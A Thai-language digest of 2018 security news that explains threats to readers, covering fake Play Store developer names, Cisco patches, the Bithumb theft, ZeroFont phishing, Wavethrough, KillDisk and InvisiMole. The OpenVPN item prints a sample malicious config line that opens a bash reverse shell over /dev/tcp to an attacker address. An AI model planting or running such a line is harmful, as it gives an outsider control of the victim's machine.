ผู้เชี่ยวชาญด้านความปลอดภัยของ Android กำลังเตือนผู้ใช้ว่า มีนักพัฒนาแอนดรอยด์บางคนหลอกล่อให้ผู้ใช้ติดตั้งแอปของตนโดยการลงทะเบียนบัญชีนักพัฒนาซอฟต์แวร์ Google Play Store เป็นจำนวนการ installs เช่น "1 million installs," Installs 1,000,000," "100,000,000 Downloads," "5,000,000+," "1,000,000,000" และอื่นๆที่รูปแบบคล้ายกัน ทำให้ผู้ใช้งานเผลอติดตั้งแอปผิดพลาดอย่างไม่ได้ตั้งใจ

เทคนิคนี้เป็นวิธีที่ง่าย แต่มีประสิทธิภาพในการทำให้ผู้ใช้เข้าใจผิดโดยเฉพาะอย่างยิ่งผู้ที่เลือกแอปตามความนิยม แม้แอปเหล่านี้จะไม่มีอันตราย แต่ก็อาจถูกใช้แพร่เชื้อมัลแวร์ในอนาคตได้อย่างง่ายดาย โชคดีที่เทคนิคนี้ยังง่ายต่อการตรวจสอบหากผู้ใช้ระวังในใช้ Google Play Store นักวิจัยมัลแวร์จาก ESET "Lukas Stefanko" ออกมาเปิดเผยเทคนิคใหม่ที่ผู้พัฒนามัลแวร์บนแอนดรอยด์ใช้เพื่อหลอกผู้ใช้ว่าแอปมีความน่าเชื่อถือ โดยมีจุดประสงค์เพื่อให้ผู้ใช้หลงเชื่อและติดตั้งแอปที่เป็นมัลแวร์

เทคนิคนี้อาศัยการสมัครบัญชีสำหรับนักพัฒนาแอปที่สามารถส่งแอปขึ้นไปบน Google Play Store ได้ โดยแทนที่จะใส่ชื่อของนักพัฒนาแอปจริงๆ ลงไปในบัญชี ผู้ร้ายจะทำการเปลี่ยนชื่อเป็น "1 million installs," Installs 1,000,000," "100,000,000 Downloads," "5,000,000+," "1,000,000,000" แทน ซึ่งเมื่อแอปถูกนำขึ้น Google Play Store ในส่วนของชื่อของผู้พัฒนาแอปจะถูกแทนที่ด้วยคำในลักษณะนี้ และทำให้ผู้ใช้งานหลงเชื่อว่าเป็นแอปจริงได้

สิ่งที่ต้องคำนึงถึง เมื่อติดตั้งแอป
- Google จะใส่ข้อมูลที่เป็นทางการในช่องพิเศษบนหน้า Play สโตร์ของแอปเท่านั้น
- หมายเลขจำนวนการ install ของ Google จะปรากฏในส่วน "ข้อมูลเพิ่มเติม" ที่ด้านล่างของหน้า Play สโตร์ของแต่ละแอป
- หากจำนวนการ install มีน้อย แต่ผู้พัฒนาอ้างเหตุผลต่างๆนาๆที่ไม่ชอบมาพากล แอปจะเป็นอันตรายอย่างเห็นได้ชัด
- Google Play ไม่มีป้าย "Verified" ดังนั้นอย่าเชื่อว่านักพัฒนาแอปอาจอ้างสิทธิ์ในไอคอนแอปของตน
- อ่านบทวิจารณ์ของผู้ใช้ก่อนดาวน์โหลดแอปทุกครั้ง ผู้ใช้งานควรตรวจสอบที่มาของแอปอย่างถี่ถ้วนทุกครั้งก่อนติดตั้งแอปใดๆ และควรสังเกตความผิดปกติของแอป เช่น โลโก้, คอมเมนต์รีวิว หรือชื่อของผู้พัฒนาก่อนที่จะติดตั้งแอปเสมอ

ที่มา : bleepingcomputer

Cisco ประกาศแพตช์ช่องโหว่ด้านความปลอดภัยซึ่งปิดช่องโหว่กว่า 34 รายการสำหรับแพตช์ประจำเดือนมิถุนายน 2561 โดยมี 7 รายการเป็นช่องโหว่ระดับวิกฤติใน NX-OS และ FXOS ซึ่งส่งผลให้ผู้โจมตีสามารถรันคำสั่งที่เป็นอันตรายเพื่อโจมตีอุปกรณ์ได้จากระยะไกล

สำหรับช่องโหว่ระดับวิกฤติ 4 จาก 7 ช่องโหว่ที่ส่งผลกระทบ NX-OS และ FXOS ล้วนแล้วแต่มีที่มีจาก Cisco Fabric Services และมีคะแนน CVSSv3 สูงถึง 9.8/10 คะแนน ที่มาของช่องโหว่ทั้ง 4 รายการนี้เกิดการที่ Cisco Fabric Services นั้นไม่มีการตรวจสอบแพ็คเกตที่ถูกส่งมาอย่างเหมาะสมพอ ทำให้ผู้โจมตีสามารถสร้างแพ็คเกตพิเศษและส่งตรงมาถึงอุปกรณ์ที่มีช่องโหว่เพื่อรันโค้ดที่เป็นอันตรายได้โดยตรง หรือทำให้อุปกรณ์ไม่สามารถให้บริการได้

Recommendation แนะนำให้ผู้ดูแลระบบตรวจสอบรายการช่องโหว่ทั้งหมดที่มีการเปิดเผยในเดือนนี้อีกครั้งจากลิงค์ด้านล่าง รวมไปถึงทำการแพตช์เพื่อป้องกันการโจมตีช่องโหว่เหล่านี้
https://tools.

Jacob Baines วิศวกรด้านความปลอดภัยจาก Tenable ได้แสดงเทคนิคการโจมตีใหม่โดยอาศัยการแก้ไขไฟล์การตั้งค่าของ OpenVPN เพื่อสอดแทรกคำสั่งที่เป็นอันตรายลงไป โดยเมื่อไฟล์ดังกล่าวถูกรันโดย OpenVPN คำสั่งที่ถูกสอดแทรกลงไปก็จะสามารถรันในเครื่องของเหยื่อ ซึ่งอาจส่งผลให้เกิดการรันคำสั่งเป็นอันตรายขึ้นมาได้

ในตัวอย่างการโจมตีของ Jacob Baines สิ่งที่ผู้โจมตีจำเป็นต้องทำคือการเพิ่มบรรทัด "script-security 2" ลงในไฟล์ OVPN ก่อนจะเพิ่ม up "cmd" ตามด้วยคำสั่งที่จะรันในระบบของเหยื่อ คำสั่ง script-security 2 จะทำให้ OpenVPN รันโค้ดที่ผู้ใช้กำหนดได้เองซึ่งหมายถึงคำสั่งในบรรทัด up "cmd" ได้ ตัวอย่างของการแก้ไขมีรายละเอียด้านล่าง โดยเป็นการสร้างการเชื่อมต่อกลับไปยังระบบของผู้โจมตี เปิดช่องทางให้ผู้โจมตีทำการควบคุมได้

script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0&1&’”

การโจมตีนี้สามารถถูกสังเกตได้หลายวิธีการ อาทิ การตรวจสอบที่ไฟล์ OVPN หรือการตรวจสอบจากหน้าต่างของ OpenVPN เมื่อมีการเชื่อมต่อซึ่งจะแสดงให้เห็นคำสั่งที่เป็นอันตรายที่ถูกรันอย่างชัดเจน

ที่มา : bleepingcomputer

เว็บไซต์สำหรับแลกเปลี่ยน cryptocurrency จากเกาหลีใต้ "Bithumb" ถูกแฮกเป็นครั้งที่สองในรอบปี โดยในครั้งนี้นั้นผู้โจมตีประสบความสำเร็จที่จะขโมยเงินกว่า 31.6 ล้านดอลลาร์สหรัฐฯ ออกจากระบบ

ในขณะนี้ Bithumb ยังไม่ได้มีประกาศอย่างเป็นทางการว่าการโจมตีนั้นเกิดขึ้นได้อย่างไร ผู้โจมตีมีวิธีการนำเงินออกจากระบบได้อย่างไรและมีสกุลเงินใดที่ได้รับผลกระทบบ้าง อย่างไรก็ตามมีผู้ใช้งานหลายรายที่ค้นพบว่าเงินในสกุล Ripple ของตัวเองนั้นหายไป

อย่างไรก็ตามอ้างอิงจากประกาศอย่างเป็นทางการของ Bithumb ทางเว็บไซต์ได้ทำการโยกข้อมูลทั้งหมดไปไว้ใน cold wallet แล้ว และจะทำการตรวจสอบและแก้ไขช่องโหว่ในระบบก่อนที่จะดำเนินการ refund เงินที่ถูกขโมยไปให้กับผู้ใช้งาน

ที่มา : cyberscoop

บริษัทด้าน Cloud Security "Avanan" ประกาศการค้นพบเทคนิคใหม่ "Zerofont" ซึ่งช่วยผู้โจมตีสามารถข้ามผ่านกระบวนการตรวจสอบอีเมลเมื่อส่งอีเมลที่เป็นอันตรายไปหาผู้ใช้งานได้

เทคนิค ZeroFont นั้นอาศัยหลักการของแทรก "ข้อความที่ถูกซ่อน" ลงไปในส่วนเนื้อหาของอีเมลที่เป็นอันตราย โดยข้อความที่ถูกซ่อนนี้จะใช้วิธีการซ่อนโดยการตั้งขนาดของตัวอักษรให้เป็น 0 ซึ่งเมื่อถูกตรวจสอบด้วยคอมพิวเตอร์แล้วอาจเห็นข้อความที่แตกต่างกันออกไปจากที่ผู้ใช้งานเห็น

ยังไม่มีการระบุว่าไมโครซอฟต์ได้รับทราบและแก้ไขปัญหานี้ไปแล้วหรือไม่ อย่างไรก็ตามผู้ใช้งานควรระมัดระวังและตรวจสอบที่มาของอีเมลทุกครั้งนอกเหนือจากการตรวจสอบเนื้อหาของอีเมลโดยทั่วไปเพื่อป้องกันการถูกโจมตีในลักษณะนี้

ที่มา : thehackernews

นักพัฒนาจากทีม Google Chrome "Jake Archibald" ค้นพบช่องโหว่ด้านความปลอดภัย "Wavethrough" ในเบราว์เซอร์รุ่นใหม่ๆ ซึ่งส่งผลให้เว็บไซต์ที่ถูกเปิดอยู่ในโปรแกรมเว็บเบราว์เซอร์เดียวกันในขณะนั้นสามารถเข้าถึงข้อมูลระหว่างกันได้

โดยปกตินั้นเมื่อผู้ใช้งานเข้าชมเว็บไซต์ เบราว์เซอร์จะไม่ได้รับอนุญาตให้เรียกดูข้อมูลของเว็บไซต์อื่นๆ ที่ไม่ได้มีที่มาจากเว็บไซต์ที่ผู้ใช้งานเข้าชมอยู่ อย่างไรก็ตามช่องโหว่ Wavethrough นั้นเกิดขึ้นในกรณีของการเรียกหาข้อมูลในลักษณะที่เป็นไฟล์เสียงหรือไฟล์วีดิโอ ที่สามารถถูกเรียกข้ามเว็บไซต์ได้อย่างไม่มีเงื่อนไข

การเรียกหาข้อมูลที่เป็นไฟล์เสียงหรือไฟล์วีดิโอสามารถถูกเรียกได้เป็นส่วนๆ ในกรณีที่ไฟล์อาจมีขนาดใหญ่ เมื่อส่วนย่อยๆ ถูกเรียกและถูกใช้งานจนเกือบครบ เบราว์เซอร์จะพยายามค้นหาชิ้นส่วนต่อไปของไฟล์เพื่อที่จะเรียกและนำมาใช้งานใหม่ อย่างไรก็ตามการเรียกหาข้อมูลแบบเป็นส่วนๆ นี้กลับไม่ได้ถูกครอบคลุมโดยมาตรฐานความปลอดภัยที่ดีพอ ทำให้เกิดการนำไปพัฒนาที่แตกต่างกันและเกิดเป็นช่องโหว่ขึ้นมาได้

Jake Archibald ค้นพบช่องโหว่ Wavethrough ใน Microsoft Edge และ Mozilla Firefox ซึ่งทำให้การเรียกส่วนของข้อมูลนั้นสามารถูกบังคับให้เป็นการเรียกข้ามขอบเขตที่ควรจะเป็น หรือเรียกข้ามเว็บไซต์ได้ โดย Jake ได้แสดงตัวอย่างการโจมตีซึ่งทำให้เขาสามารถดึงข้อมูลของเว็บไซต์ที่มีการล็อกอินค้างอยู่ในโปรแกรมเว็บเบราว์เซอร์ได้

Recommendation : ในขณะนี้ช่องโหว่ดังกล่าวซึ่งตรวจพบใน Microsoft Edge และ Mozilla Firefox ได้ถูกแพตช์แล้ว แนะนำให้ผู้ใช้งานดำเนินการอัปเดตโปรแกรมเว็บเบราว์เซอร์ให้เป็นเวอร์ชันล่าสุดเพื่อรับแพตช์ช่องโหว่โดยด่วน
Affected Platform : Microsoft Edge และ Mozilla Firefox

ที่มา : thehackernews

Banco de Chile ธนาคารที่ใหญ่ที่สุดในชิลีตกเป็นเป้าหมายในการโจมตีทางไซเบอร์เมื่อวันที่ 24 พฤษภาคมที่ผ่านมา โดยผู้โจมตีมีการใช้มัลแวร์ KillDisk ในการโจมตีระบบซึ่งเชื่อกันว่าเพื่ออำพรางปฏิบัติการในขโมยเงินออกจากระบบ SWIFT ของธนาคาร

มัลแวร์ KillDisk เป็นมัลแวร์ที่ถูกพัฒนาขึ้นเพื่อเขียนทับข้อมูลในส่วน Master Boot Record (MBR) ซึ่งส่งผลให้คอมพิวเตอร์ไม่สามารถใช้งานได้ โดย KillDisk เป็นที่รู้จักกันในวงกว้างเนื่องมันถูกนำมาใช้ในรูปแบบของมัลแวร์เรียกค่าไถ่ด้วย

อย่างไรก็ตามในกรณีของ Banco de Chile ทาง Trend Micro ซึ่งเป็นผู้ตรวจพบการแพร่กระจายของ KillDisk ในแถบละตินอเมริกากล่าวว่า KillDisk ที่ตรวจพบในครั้งนี้นั้นอาจเป็น KillDisk ในเวอร์ชันใหม่เนื่องจากไม่ได้มีการแสดงข้อความขู่เรียกค่าไถ่และอาจมีเป้าหมายเพียงอย่างเดียวในการทำให้ระบบคอมพิวเตอร์ไม่สามารถใช้งานได้

Trend Micro ได้ให้ข้อมูลเพิ่มเติมอีกด้วยว่า สายพันธุ์ของมัลแวร์ KillDisk สายพันธุ์ใหม่นี้มีความเชื่อมโยงกับกลุ่มแฮกเกอร์ซึ่งเคยพยายามขโมยเงินจากธนาคารเม็กซิกัน Bancomext กว่า 110 ล้านดอลลาร์สหรัฐฯ ด้วย

ล่าสุดในวันที่ 9 มิถุนายนที่ผ่านมา Banco de Chile ได้ออกมาประกาศอย่างเป็นทางการว่ากลุ่มผู้โจมตีได้ขโมยเงินออกไปจากระบบกว่า 10 ล้านดอลลาร์สหรัฐฯ ในช่วงที่ KillDisk แพร่กระจายในระบบจริง แต่ยังไม่มีการระบุว่ามีพฤติกรรมการโจมตีในลักษณะใดในตอนนี้

ที่มา : bleepingcomputer

ESET ประกาศการค้นพบมัลแวร์ลักลอบขโมยข้อมูล "InvisiMole" ซึ่งแพร่กระจายในรัสเซียและยูเครนวันนี้ โดยเชื่อกันว่าเป็นมัลแวร์ที่ถูกใช้ในการจารกรรมทางไซเบอร์เนื่องจากความซับซ้อนและความสามารถของมัลแวร์ที่หลากหลายและทำให้มัลแวร์ถูกตรวจจับได้ยาก

อ้างอิงจากรายงานของ ESET มัลแวร์ InvisiMole แพร่กระจายมาตั้งแต่ปี 2013 โดยมีเป้าหมายค่อนข้างจำกัดซึ่งทำให้ตรวจจับได้ยาก มัลแวร์รองรับการควบคุมจากกลุ่มผู้โจมตีเพื่อทำให้ทำตามคำสั่งที่ต้องการซึ่งรวมไปถึงแอบเปิดไมโครโฟนเพื่อดันเสียง แอบเปิดกล้องเว็บแคมเพื่อถ่ายรูป นอกเหนือจากนั้นยังแก้ไขการตั้งค่าของระบบได้อย่างอิสระ

ไม่มีการระบุถึงช่องทางในการแพร่กระจายของมัลแวร์ InvisiMole ในขณะนี้

ทาง ESET ยืนยันว่าในขณะนี้การแพร่กระจายของ InvisiMole ยังอยู่ในขอบเขตที่จำกัดมากๆ แต่ก็แนะนำให้ผู้ใช้งานหมั่นทำการอัปเดตระบบให้มีความทันสมัยอยู่เสมอ รวมไปถึงฐานข้อมูลเพื่อตรวจจับมัลแวร์ด้วย

ที่มา : bleepingcomputer

Cisco ประกาศแก้ไขช่องโหว่ที่เกี่ยวข้องกับบัญชีลับหรือ backdoor account เป็นครั้งที่สี่ในเดือนนี้หลังจากมีการตรวจพบถึงการมีอยู่ของรหัสผ่านในซอฟต์แวร์ Cisco Wide Area Application Services ซึ่งอาจทำให้ผู้โจมตีสามารถเข้าถึงการตั้งค่าของอุปกรณ์ได้

ช่องโหว่รหัส CVE-2018-0329 เกิดขึ้นหลังจากที่นักวิจัยด้านความปลอดภัย Aaron Blair จาก RIoT Solutions ไปค้นพบถึงการมีอยู่ของชุดสตริงนี้ซึ่งเป็น SNMP community string ในไฟล์ตั้งค่าของ SNMP daemon ซึ่งเขาเองยังพบอีกช่องโหว่หนึ่งรหัส CVE-2018-0352 โดยเป็นช่องโหว่ยกระดับสิทธิ์ใน Cisco WaaS ด้วย

ที่มา : bleepingcomputer

หลังจากที่ธนาคาร Bank of Montreal และ Simplii Financial ได้ประกาศการรั่วไหลของข้อมูลเมื่ออาทิตย์ที่ผ่านมา แฮกเกอร์ผู้ซึ่งอ้างว่าเป็นผู้โจมตีในครั้งนี้นั้นได้ออกมาขู่เรียกค่าไถ่กว่าเกือบ 1 ล้านเหรียญสหรัฐฯ ในสกุลเงิน Ripple เพื่อแลกกับการไม่เปิดเผยข้อมูลที่รั่วไหลออกมาของลูกค้ากว่า 100,000 คน

อีเมลที่ถูกส่งเพื่อเรียกค่าไถ่จากกลุ่มแฮกเกอร์ยังมีการเปิดเผยถึงวิธีการในเบื้องต้นที่ทำให้แฮกเกอร์สามารถเข้าถึงข้อมูลของบัญชีลูกค้าได้โดยอ้างว่า พวกเขาใช้อัลกอริธึมทางคณิตศาสตร์ทั่วไปในการสร้างเลขของบัญชีธนาคารที่เป็นเลขบัญชีจริง จากนั้นจึงใช้ข้อมูลดังกล่าวในการร้องขอให้ระบบล้างและตั้งค่ารหัสผ่านใหม่ได้

สำนักข่าว CBC News ออกมายืนยันการโจมตีนี้และยืนยันเพิ่มเติมว่าข้อมูลที่ผู้โจมตีใช้ในการกล่าวอ้างนั้นเป็นข้อมูลของลูกค้าซึ่งมีตัวตนจริง โดยทางธนาคารยังคงยืนยันที่จะไม่จ่ายค่าไถ่ให้กับแฮกเกอร์ โดยจะโฟกัสไปที่การปกป้องข้อมูลของผู้ใช้งานที่รั่วไหลออกต่อไป

ที่มา : BANK INFO SECURITY